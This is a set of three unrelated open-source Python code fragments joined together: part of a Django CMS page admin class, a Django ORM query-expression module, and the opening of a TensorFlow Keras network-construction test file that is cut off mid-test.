first page model, based on the ``ADD_PAGE_ORDER`` setting.
"""
if self.model is Page:
return HttpResponseRedirect(self.get_content_models()[0].add_url)
return super(PageAdmin, self).add_view(request, **kwargs)
def change_view(self, request, object_id, **kwargs):
"""
For the ``Page`` model, check ``page.get_content_model()``
for a subclass and redirect to its admin change view.
Also enforce custom change permissions for the page instance.
"""
page = get_object_or_404(Page, pk=object_id)
content_model = page.get_content_model()
self._check_permission(request, content_model, "change")
if self.model is Page:
if content_model is not None:
change_url = admin_url(content_model.__class__, "change",
content_model.id)
return HttpResponseRedirect(change_url)
kwargs.setdefault("extra_context", {})
kwargs["extra_context"].update({
"hide_delete_link": not content_model.can_delete(request),
"hide_slug_field": content_model.overridden(),
})
return super(PageAdmin, self).change_view(request, object_id, **kwargs)
def delete_view(self, request, object_id, **kwargs):
"""
Enforce custom delete permissions for the page instance.
"""
page = get_object_or_404(Page, pk=object_id)
content_model = page.get_content_model()
self._check_permission(request, content_model, "delete")
return super(PageAdmin, self).delete_view(request, object_id, **kwargs)
def changelist_view(self, request, extra_context=None):
"""
Redirect to the ``Page`` changelist view for ``Page``
subclasses.
"""
if self.model is not Page:
return HttpResponseRedirect(admin_url(Page, "changelist"))
if not extra_context:
extra_context = {}
extra_context["page_models"] = self.get_content_models()
return super(PageAdmin, self).changelist_view(request, extra_context)
def save_model(self, request, obj, form, change):
"""
Set the ID of the parent page if passed in via querystring, and
make sure the new slug propagates to all descendant pages.
"""
if change and obj._old_slug != obj.slug:
# _old_slug was set in PageAdminForm.clean_slug().
new_slug = obj.slug or obj.generate_unique_slug()
obj.slug = obj._old_slug
obj.set_slug(new_slug)
# Force parent to be saved to trigger handling of ordering and slugs.
parent = request.GET.get("parent")
if parent is not None and not change:
obj.parent_id = parent
obj.save()
super(PageAdmin, self).save_model(request, obj, form, change)
def _maintain_parent(self, request, response):
"""
Maintain the parent ID in the querystring for response_add and
response_change.
"""
location = response._headers.get("location")
parent = request.GET.get("parent")
if parent and location and "?" not in location[1]:
url = "%s?parent=%s" % (location[1], parent)
return HttpResponseRedirect(url)
return response
def response_add(self, request, obj):
"""
Enforce page permissions and maintain the parent ID in the
querystring.
"""
response = super(PageAdmin, self).response_add(request, obj)
return self._maintain_parent(request, response)
def response_change(self, request, obj):
"""
Enforce page permissions and maintain the parent ID in the
querystring.
"""
response = super(PageAdmin, self).response_change(request, obj)
return self._maintain_parent(request, response)
@classmethod
def get_content_models(cls):
"""
Return all Page subclasses that are admin registered, ordered
based on the ``ADD_PAGE_ORDER`` setting.
"""
models = []
for model in Page.get_content_models():
try:
admin_url(model, "add")
except NoReverseMatch:
continue
else:
setattr(model, "meta_verbose_name", model._meta.verbose_name)
setattr(model, "add_url", admin_url(model, "add"))
models.append(model)
order = [name.lower() for name in settings.ADD_PAGE_ORDER]
def sort_key(page):
name = "%s.%s" % (page._meta.app_label, page._meta.object_name)
unordered = len(order)
try:
return (order.index(name.lower()), "")
except ValueError:
return (unordered, page.meta_verbose_name)
return sorted(models, key=sort_key)
# Drop the meta data fields, and move slug towards the stop.
link_fieldsets = deepcopy(page_fieldsets[:1])
link_fieldsets[0][1]["fields"] = link_fieldsets[0][1]["fields"][:-1]
link_fieldsets[0][1]["fields"].insert(1, "slug")
class LinkAdmin(PageAdmin):
fieldsets = link_fieldsets
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Make slug mandatory.
"""
if db_field.name == "slug":
kwargs["required"] = True
return super(LinkAdmin, self).formfield_for_dbfield(db_field, **kwargs)
def save_form(self, request, form, change):
"""
Don't show links in the sitemap.
"""
obj = form.save(commit=False)
if not obj.id and "in_sitemap" not in form.fields:
obj.in_sitemap = False
return super(LinkAdmin, self).save_form(request, form, change)
admin.site.register(Page, PageAdmin)
admin.site.register(RichTextPage, PageAdmin)
admin.site.register(Link, LinkAdmin)
| |
import copy
import datetime
from django.conf import settings
from django.core.exceptions import FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import Q, refs_aggregate
from django.utils import six, timezone
from django.utils.functional import cached_property
class Combinable(object):
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return CombinedExpression(other, connector, self)
return CombinedExpression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __div__(self, other): # Python 2 compatibility
return type(self).__truediv__(self, other)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rdiv__(self, other): # Python 2 compatibility
return type(self).__rtruediv__(self, other)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class BaseExpression(object):
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
def __init__(self, output_field=None):
self._output_field = output_field
def get_db_converters(self, connection):
return [self.convert_value] + self.output_field.get_db_converters(connection)
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else (
F(arg) if isinstance(arg, six.string_types) else Value(arg)
) for arg in expressions
]
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(Expression, self).as_sql(compiler, connection)
setattr(Expression, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
@cached_property
def contains_column_references(self):
for expr in self.get_source_expressions():
if expr and expr.contains_column_references:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
* for_save: whether this expression about to be used in a save or update
Returns: an Expression to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
c.set_source_expressions([
expr.resolve_expression(query, allow_joins, reuse, summarize)
for expr in c.get_source_expressions()
])
return c
def _prepare(self):
"""
Hook used by Field.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here. This isn't always correct, but it makes sense most of the
time.
Consider the difference between `2 + 2` and `2 / 3`. Inferring
the type here is a convenience for the common case. The user should
supply their own output_field with more complex computations.
If a source does not have an `_output_field` then we exclude it from
this check. If all sources are `None`, then an error will be thrown
higher up the stack in the `output_field` property.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
for source in sources:
if self._output_field is None:
self._output_field = source
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, expression, connection, context):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def refs_aggregate(self, existing_aggregates):
"""
Does this expression contain a reference to some of the
existing aggregates? If so, returns the aggregate and also
the lookup parts that *weren't* found. So, if
exsiting_aggregates = {'max_id': Max('id')}
self.name = 'max_id'
queryset.filter(max_id__range=[10,100])
then this method will return Max('id') and those parts of the
name that weren't found. In this case `max_id` is found and the range
portion is returned as ('range',).
"""
for node in self.get_source_expressions():
agg, lookup = node.refs_aggregate(existing_aggregates)
if agg:
return agg, lookup
return False, ()
def get_group_by_cols(self):
if not self.contains_aggregate:
return [self]
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
def reverse_ordering(self):
return self
def flatten(self):
"""
Recursively yield this expression and all subexpressions, in
depth-first order.
"""
yield self
for expr in self.get_source_expressions():
if expr:
for inner_expr in expr.flatten():
yield inner_expr
class Expression(BaseExpression, Combinable):
"""
An expression that can be combined with other expressions.
"""
pass
class CombinedExpression(Expression):
def __init__(self, lhs, connector, rhs, output_field=None):
super(CombinedExpression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self)
def __str__(self):
return "{} {} {}".format(self.lhs, self.connector, self.rhs)
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField')
or (rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
class DurationExpression(CombinedExpression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
else:
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class F(Combinable):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def refs_aggregate(self, existing_aggregates):
return refs_aggregate(self.name.split(LOOKUP_SEP), existing_aggregates)
def asc(self):
return OrderBy(self)
def desc(self):
return OrderBy(self, descending=True)
class Func(Expression):
"""
A SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
arity = None # The number of arguments the function accepts.
def __init__(self, *expressions, **extra):
if self.arity is not None and len(expressions) != self.arity:
raise TypeError(
"'%s' takes exactly %s %s (%s given)" % (
self.__class__.__name__,
self.arity,
"argument" if self.arity == 1 else "arguments",
len(expressions),
)
)
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def __repr__(self):
args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
if extra:
return "{}({}, {})".format(self.__class__.__name__, args, extra)
return "{}({})".format(self.__class__.__name__, args)
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, function=None, template=None):
connection.ops.check_expression_support(self)
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
if function is None:
self.extra['function'] = self.extra.get('function', self.function)
else:
self.extra['function'] = function
self.extra['expressions'] = self.extra['field'] = self.arg_joiner.join(sql_parts)
template = template or self.extra.get('template', self.template)
return template % self.extra, params
def as_sqlite(self, *args, **kwargs):
sql, params = self.as_sql(*args, **kwargs)
try:
if self.output_field.get_internal_type() == 'DecimalField':
sql = 'CAST(%s AS NUMERIC)' % sql
except FieldError:
pass
return sql, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(Expression):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.value)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
val = self.value
# check _output_field to avoid triggering an exception
if self._output_field is not None:
if self.for_save:
val = self.output_field.get_db_prep_save(val, connection=connection)
else:
val = self.output_field.get_db_prep_value(val, connection=connection)
if val is None:
# cx_Oracle does not always convert None to the appropriate
# NULL type (like in case expressions using numbers), so we
# use a literal SQL NULL
return 'NULL', []
return '%s', [val]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.for_save = for_save
return c
def get_group_by_cols(self):
return []
class DurationValue(Value):
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
if (connection.features.has_native_duration_field and
connection.features.driver_supports_timedelta_args):
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
def __init__(self, sql, params, output_field=None):
if output_field is None:
output_field = fields.Field()
self.sql, self.params = sql, params
super(RawSQL, self).__init__(output_field=output_field)
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)
def as_sql(self, compiler, connection):
return '(%s)' % self.sql, self.params
def get_group_by_cols(self):
return [self]
class Star(Expression):
def __repr__(self):
return "'*'"
def as_sql(self, compiler, connection):
return '*', []
class Random(Expression):
def __init__(self):
super(Random, self).__init__(output_field=fields.FloatField())
def __repr__(self):
return "Random()"
def as_sql(self, compiler, connection):
return connection.ops.random_function_sql(), []
class Col(Expression):
contains_column_references = True
def __init__(self, alias, target, output_field=None):
if output_field is None:
output_field = target
super(Col, self).__init__(output_field=output_field)
self.alias, self.target = alias, target
def __repr__(self):
return "{}({}, {})".format(
self.__class__.__name__, self.alias, self.target)
def as_sql(self, compiler, connection):
qn = compiler.quote_name_unless_alias
return "%s.%s" % (qn(self.alias), qn(self.target.column)), []
def relabeled_clone(self, relabels):
return self.__class__(relabels.get(self.alias, self.alias), self.target, self.output_field)
def get_group_by_cols(self):
return [self]
def get_db_converters(self, connection):
if self.target == self.output_field:
return self.output_field.get_db_converters(connection)
return (self.output_field.get_db_converters(connection) +
self.target.get_db_converters(connection))
class Ref(Expression):
"""
Reference to column alias of the query. For example, Ref('sum_cost') in
qs.annotate(sum_cost=Sum('cost')) query.
"""
def __init__(self, refs, source):
super(Ref, self).__init__()
self.refs, self.source = refs, source
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)
def get_source_expressions(self):
return [self.source]
def set_source_expressions(self, exprs):
self.source, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
# The sub-expression `source` has already been resolved, as this is
# just a reference to the name of `source`.
return self
def relabeled_clone(self, relabels):
return self
def as_sql(self, compiler, connection):
return "%s" % connection.ops.quote_name(self.refs), []
def get_group_by_cols(self):
return [self]
class ExpressionWrapper(Expression):
"""
An expression that can wrap another expression so that it can provide
extra context to the inner expression, such as the output_field.
"""
def __init__(self, expression, output_field):
super(ExpressionWrapper, self).__init__(output_field=output_field)
self.expression = expression
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
return self.expression.as_sql(compiler, connection)
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.expression)
class When(Expression):
template = 'WHEN %(condition)s THEN %(result)s'
def __init__(self, condition=None, then=None, **lookups):
if lookups and condition is None:
condition, lookups = Q(**lookups), None
if condition is None or not isinstance(condition, Q) or lookups:
raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
super(When, self).__init__(output_field=None)
self.condition = condition
self.result = self._parse_expressions(then)[0]
def __str__(self):
return "WHEN %r THEN %r" % (self.condition, self.result)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return [self.condition, self.result]
def set_source_expressions(self, exprs):
self.condition, self.result = exprs
def get_source_fields(self):
# We're only interested in the fields of the result expressions.
return [self.result._output_field_or_none]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, template=None):
connection.ops.check_expression_support(self)
template_params = {}
sql_params = []
condition_sql, condition_params = compiler.compile(self.condition)
template_params['condition'] = condition_sql
sql_params.extend(condition_params)
result_sql, result_params = compiler.compile(self.result)
template_params['result'] = result_sql
sql_params.extend(result_params)
template = template or self.template
return template % template_params, sql_params
def get_group_by_cols(self):
# This is not a complete expression and cannot be used in GROUP BY.
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
class Case(Expression):
"""
An SQL searched CASE expression:
CASE
WHEN n > 0
THEN 'positive'
WHEN n < 0
THEN 'negative'
ELSE 'zero'
END
"""
template = 'CASE %(cases)s ELSE %(default)s END'
case_joiner = ' '
def __init__(self, *cases, **extra):
if not all(isinstance(case, When) for case in cases):
raise TypeError("Positional arguments must all be When objects.")
default = extra.pop('default', None)
output_field = extra.pop('output_field', None)
super(Case, self).__init__(output_field)
self.cases = list(cases)
self.default = self._parse_expressions(default)[0]
def __str__(self):
return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self)
def get_source_expressions(self):
return self.cases + [self.default]
def set_source_expressions(self, exprs):
self.cases = exprs[:-1]
self.default = exprs[-1]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, case in enumerate(c.cases):
c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def copy(self):
c = super(Case, self).copy()
c.cases = c.cases[:]
return c
def as_sql(self, compiler, connection, template=None, extra=None):
connection.ops.check_expression_support(self)
if not self.cases:
return compiler.compile(self.default)
template_params = dict(extra) if extra else {}
case_parts = []
sql_params = []
for case in self.cases:
case_sql, case_params = compiler.compile(case)
case_parts.append(case_sql)
sql_params.extend(case_params)
template_params['cases'] = self.case_joiner.join(case_parts)
default_sql, default_params = compiler.compile(self.default)
template_params['default'] = default_sql
sql_params.extend(default_params)
template = template or self.template
sql = template % template_params
if self._output_field_or_none is not None:
sql = connection.ops.unification_cast_sql(self.output_field) % sql
return sql, sql_params
class Date(Expression):
"""
Add a date selection column.
"""
def __init__(self, lookup, lookup_type):
super(Date, self).__init__(output_field=fields.DateField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.lookup, self.lookup_type)
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateField), "%r isn't a DateField." % field.name
if settings.USE_TZ:
assert not isinstance(field, fields.DateTimeField), (
"%r is a DateTimeField, not a DateField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.date_trunc_sql(self.lookup_type, sql), []
def copy(self):
copy = super(Date, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
return copy
def convert_value(self, value, expression, connection, context):
if isinstance(value, datetime.datetime):
value = value.date()
return value
class DateTime(Expression):
"""
Add a datetime selection column.
"""
def __init__(self, lookup, lookup_type, tzinfo):
super(DateTime, self).__init__(output_field=fields.DateTimeField())
self.lookup = lookup
self.col = None
self.lookup_type = lookup_type
if tzinfo is None:
self.tzname = None
else:
self.tzname = timezone._get_timezone_name(tzinfo)
self.tzinfo = tzinfo
def __repr__(self):
return "{}({}, {}, {})".format(
self.__class__.__name__, self.lookup, self.lookup_type, self.tzinfo)
def get_source_expressions(self):
return [self.col]
def set_source_expressions(self, exprs):
self.col, = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
copy = self.copy()
copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
field = copy.col.output_field
assert isinstance(field, fields.DateTimeField), (
"%r isn't a DateTimeField." % field.name
)
return copy
def as_sql(self, compiler, connection):
sql, params = self.col.as_sql(compiler, connection)
assert not(params)
return connection.ops.datetime_trunc_sql(self.lookup_type, sql, self.tzname)
def copy(self):
copy = super(DateTime, self).copy()
copy.lookup = self.lookup
copy.lookup_type = self.lookup_type
copy.tzname = self.tzname
return copy
def convert_value(self, value, expression, connection, context):
if settings.USE_TZ:
if value is None:
raise ValueError(
"Database returned an invalid value in QuerySet.datetimes(). "
"Are time zone definitions for your database and pytz installed?"
)
value = value.replace(tzinfo=None)
value = timezone.make_aware(value, self.tzinfo)
return value
class OrderBy(BaseExpression):
template = '%(expression)s %(ordering)s'
def __init__(self, expression, descending=False):
self.descending = descending
if not hasattr(expression, 'resolve_expression'):
raise ValueError('expression must be an expression type')
self.expression = expression
def __repr__(self):
return "{}({}, descending={})".format(
self.__class__.__name__, self.expression, self.descending)
def set_source_expressions(self, exprs):
self.expression = exprs[0]
def get_source_expressions(self):
return [self.expression]
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expression_sql, params = compiler.compile(self.expression)
placeholders = {
'expression': expression_sql,
'ordering': 'DESC' if self.descending else 'ASC',
}
return (self.template % placeholders).rstrip(), params
def get_group_by_cols(self):
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def reverse_ordering(self):
self.descending = not self.descending
return self
def asc(self):
self.descending = False
def desc(self):
self.descending = True
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#,============================================================================
"""Tests for layer graphs construction & handling."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import input_layer as input_layer_lib
from tensorflow.python.keras.engine import network as network_lib
from tensorflow.python.keras.engine import training
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import test
try:
import yaml # pylint:disable=g-import-not-at-top
except ImportError:
yaml = None
class NetworkConstructionTest(keras_parameterized.TestCase):
@test_util.run_deprecated_v1
def test_get_updates(self):
class MyLayer(keras.layers.Layer):
def build(self, input_shape):
self.a = self.add_variable('a',
(1, 1),
'float32',
trainable=False)
self.b = self.add_variable('b',
(1, 1),
'float32',
trainable=False)
self.add_update(state_ops.assign_add(self.a, [[1.]],
name='unconditional_update'))
self.built = True
def call(self, inputs):
self.add_update(state_ops.assign_add(self.b, inputs,
name='conditional_update'),
inputs=True)
return inputs + 1
x1 = input_layer_lib.Input(shape=(1,))
layer = MyLayer()
_ = layer.apply(x1)
self.assertEqual(len(layer.updates), 2)
self.assertEqual(len(layer.get_updates_for(x1)), 1)
self.assertEqual(len(layer.get_updates_for(None)), 1)
x2 = input_layer_lib.Input(shape=(1,))
y2 = layer.apply(x2)
self.assertEqual(len(layer.updates), 3)
self.assertEqual(len(layer.get_updates_for(x1)), 1)
self.assertEqual(len(layer.get_updates_for(x2)), 1)
self.assertEqual(len(layer.get_updates_for(None)), 1)
network = network_lib.Network(x2, y2)
self.assertEqual(len(network.updates), 3)
self.assertEqual(len(network.get_updates_for(x2)), 1)
self.assertEqual(len(network.get_updates_for(None)), 1)
x3 = input_layer_lib.Input(shape=(1,))
_ = layer.apply(x3)
self.assertEqual(len(network.updates), 4)
x4 = input_layer_lib.Input(shape=(1,))
_ = network(x4)
self.assertEqual(len(network.updates), 5)
self.assertEqual(len(network.get_updates_for(x2)), 1)
self.assertEqual(len(network.get_updates_for(x4)), 1)
self.assertEqual(len(network.get_updates_for(None)), 1)
network.add_update(state_ops.assign_add(layer.a, [[1]]))
self.assertEqual(len(network.updates), 6)
self.assertEqual(len(network.get_updates_for(None)), 2)
network.add_update(state_ops.assign_add(layer.b, x4), inputs=True)
self.assertEqual(len(network.updates), 7)
self.assertEqual(len(network.get_updates_for(x4)), 2)
@test_util.run_in_graph_and_eager_modes()
def test_get_updates_bn(self):
x1 = input_layer_lib.Input(shape=(1,))
layer = keras.layers.BatchNormalization()
_ = layer.apply(x1)
self.assertEqual(len(layer.updates), 2)
self.assertEqual(len(layer.get_updates_for(x1)), 2)
self.assertEqual(len(layer.get_updates_for(None)), 0)
@test_util.run_deprecated_v1
def test_get_losses(self):
class MyLayer(keras.layers.Layer):
def build(self, input_shape):
self.a = self.add_variable('a',
(1, 1),
'float32',
trainable=False)
self.b = self.add_variable('b',
(1, 1),
'float32',
trainable=False)
self.add_loss(math_ops.reduce_sum(self.a))
self.built = True
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs),
inputs=True)
return inputs + 1
x1 = input_layer_lib.Input(shape=(1,))
layer = MyLayer()
_ = layer.apply(x1)
self.assertEqual(len(layer.losses), 2)
self.assertEqual(len(layer.get_losses_for(x1)), 1)
self.assertEqual(len(layer.get_losses_for(None)), 1)
x2 = input_layer_lib.Input(shape=(1,))
